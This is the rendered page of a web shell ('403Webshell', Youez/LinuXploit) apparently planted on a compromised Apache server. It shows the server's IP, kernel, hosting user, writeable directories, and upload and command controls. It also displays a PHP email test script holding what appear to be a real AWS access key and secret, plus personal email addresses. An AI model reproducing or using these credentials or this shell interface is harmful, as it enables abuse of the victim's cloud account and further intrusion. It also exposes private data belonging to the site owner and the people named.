403Webshell
Server IP : 167.235.67.158  /  Your IP : 216.73.216.95
Web Server : Apache
System : Linux ubuntu-8gb-nbg1-1 6.8.0-111-generic #111-Ubuntu SMP PREEMPT_DYNAMIC Sat Apr 11 23:16:02 UTC 2026 x86_64
User : upstairsbar.co.uk ( 982)
PHP Version : 8.3.6
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/esl.the-word.com/reference/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/esl.the-word.com/reference/testEmail.php
<?php
ini_set('display_errors', 1);
error_reporting(E_ALL);

    // Load Composer's autoloader
    require $_SERVER["DOCUMENT_ROOT"] . '/vendor/autoload.php';
    $subject = 'a test email';
    $emailbody = 'this is a test email';
	
        $m = new SimpleEmailServiceMessage();
        $m->addTo('henry.ruhl@ultimateweb.co.uk');
        $m->setFrom('ESL Reference System <esl@ultimateweb.org>');
        $m->setSubject($subject);
        $m->setMessageFromString(strip_tags(str_replace('<br/>', "\r\n",$emailbody)), $emailbody);

        $region_endpoint = SimpleEmailService::AWS_EU_WEST1;
        $ses = new SimpleEmailService('AKIAWNHRJT5BGH5LZG46', 'RmFq8SD0gR/Pe3bdj4K63FcTjXy+yZYyxQMq0zKM', $region_endpoint);
        $result = $ses->sendEmail($m);
        echo 'res ' . print_r($result, true);
?>

Youez - 2016 - github.com/yon3zu
LinuXploit